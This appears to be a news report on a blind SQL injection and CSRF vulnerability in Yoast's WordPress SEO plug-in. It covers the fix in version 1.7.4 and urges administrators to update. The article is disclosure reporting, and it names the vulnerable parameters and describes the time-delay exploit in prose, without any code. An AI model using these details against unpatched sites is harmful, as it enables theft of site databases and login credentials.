14 DAY TRIAL // Some versions of Yoast's WordPress SEO plug-in are vulnerable to blind SQL Injection attacks due to improper sanitization of SQL queries, a security researcher has found.
Successful exploitation requires the attacker to be authenticated on the website in order to pass the queries, but with no anti-CSRF (cross-site request forgery) protection in place, the compromise can occur without the threat actor's authentication.
The fix was delivered the day following the vulnerability report
The WordPress SEO plug-in is probably the most popular in its category, having over one million active installs, as per information from its download page. The total number of downloads recorded is over 16.5 million, placing it among the highest demanded WordPress plug-ins.
As its name suggests, it is a SEO (search engine optimization) tool used on WordPress websites to increase visibility on the web.
Security researcher Ryan Dewhurst, who developed WPScan vulnerability scanner for WordPress discovered the flaw in Yoast's SEO plug-in and reported it to the developer on Tuesday.
The following day, after assessing the issue and confirming it, the developer corrected the faults by releasing version 1.7.4 of the product.
Victim interaction is required for the exploit to function
In the changelog for this version, the vendor says that it “fixed possible CSRF and blind SQL injection vulnerabilities in bulk editor. Added strict sanitation to order_by and order params. Added extra nonce checks on requests sending additional parameters. Minimal capability needed to access the bulk editor is now Editor.”
Exploiting the glitch requires an authenticated user to click on a malicious link provided by the attacker. This is not difficult to achieve and can be done with some social engineering.
The risk involved is complete compromise of the website, as the attacker can retrieve sensitive databases, such as those containing the log-in credentials.
Dewhurst created exploit code for the vulnerability, which consists in a HTTP GET request that causes the SQL query to execute and then enter idle mode for ten seconds when clicked on as an authenticated admin, editor or author user.
Website administrators relying on Yoast's SEO component for WordPress are urged to update to the latest version as soon as possible.